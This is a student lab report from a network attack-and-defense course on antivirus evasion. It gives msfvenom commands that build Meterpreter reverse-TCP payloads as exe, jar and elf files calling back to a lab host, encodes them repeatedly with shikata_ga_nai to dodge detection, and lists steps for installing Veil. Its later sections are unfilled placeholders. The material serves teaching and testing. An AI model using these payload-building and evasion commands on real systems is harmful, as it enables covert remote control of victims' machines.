20222410 2024-2025-1 《網路與系統攻防技術》實驗三實驗報告

Lelouch-vi發表於2024-10-18

1.實驗內容

  • 正確使用msf編碼器,veil-evasion,自己利用shellcode程式設計等免殺工具或技巧
    • 正確使用msf編碼器,使用msfvenom生成如jar之類的其他檔案
    • veil,加殼工具
    • 使用C + shellcode程式設計
  • 透過組合應用各種技術實現惡意程式碼免殺
    如果成功實現了免殺的,簡單語言描述原理,不要截圖。與殺軟共生的結果驗證要截圖。
  • 用另一電腦實測,在殺軟開啟的情況下,可執行並回連成功,註明電腦的殺軟名稱與版本

2.實驗過程

2.1 正確使用msf編碼器,veil-evasion,自己利用shellcode程式設計等免殺工具或技巧

2.1.1 正確使用msf編碼器,使用msfvenom生成如jar之類的其他檔案

檢視 msfvenom 支援的所有輸出格式:輸入msfvenom --list formats

輸入msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.136.132 LPORT=2410 -f exe > 20222410yh.exe,生成payload

-p windows/meterpreter/reverse_tcp:指定了要生成的 payload 型別,是一個 Meterpreter 反向 TCP 連線
LHOST=192.168.136.132 設定了連線回的本地 IP 地址,即kali虛擬機器的 IP 地址
LPORT=2410 設定了連線回的本地埠號,這裡為學號後四位
-f exe: 這指定了輸出格式為 Windows 可執行檔案


檢視 msfvenom 支援的所有編碼方式:輸入msfvenom --list encoders

使用編碼器對payload進行編碼,輸入msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -b '\x00' LHOST=192.168.136.132 LPORT=2410 -f exe > 20222410yh-2.exe

-e x86/shikata_ga_nai: 這指定了要使用的編碼器;
-b ‘\x00’: 這指定了需要避免的壞字符集;
LHOST、LPORT同上;


多次編碼:msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 10 -b '\x00' LHOST=192.168.136.132 LPORT=2410 -f exe > 20222410yh-3.exe
-i 10表示編碼10次

選擇一個適用於Java環境的payload來生成jar檔案:msfvenom -p java/meterpreter/reverse_tcp LHOST=192.168.136.132 LPORT=2410 -f jar > 20222410yh-4.jar

使用編碼器對payload進行編碼:msfvenom -p java/meterpreter/reverse_tcp LHOST=192.168.136.132 LPORT=2410 -e x86/shikata_ga_nai -i 10 -f jar > 20222410yh-5.jar

生成一個反向 TCP 連線的 Linux elf 可執行檔案:msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.136.132 LPORT=2410 -f elf > 20222410yh-6.elf

使用編碼器對payload進行編碼:msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.136.132 LPORT=2410 -e x86/shikata_ga_nai -i 10 -f elf > 20222410yh-7.elf

將生成的20222410yh.exe等多個檔案放到共享資料夾中傳到主機上
20222410yh.exe:

20222410yh-2.exe:

20222410yh-3.exe:

20222410yh-5.jar:

20222410yh-7.elf:

2.1.2 使用veil工具

安裝veil,需要保持虛擬機器是聯網狀態,依次輸入以下命令:

mkdir -p ~/.cache/wine
cd ~/.cache/wine
wget http://dl.winehq.org/wine/wine-gecko/2.47/wine_gecko-2.47-x86.msi
wget http://dl.winehq.org/wine/wine-gecko/2.47/wine_gecko-2.47-x86_64.msi
sudo apt-get install libncurses5*
sudo apt-get install libavutil55*
sudo apt-get install gcc-mingw-w64*
sudo apt-get install wine32



當輸入完sudo apt-get install wine32後報錯,此時先輸入dpkg --add-architecture i386,再輸入sudo apt-get update,然後輸入sudo apt-get install wine32即可

3.問題及解決方案

  • 問題1:XXXXXX
  • 問題1解決方案:XXXXXX
  • 問題2:XXXXXX
  • 問題2解決方案:XXXXXX - ...

4.學習感悟、思考等

xxx xxx

相關文章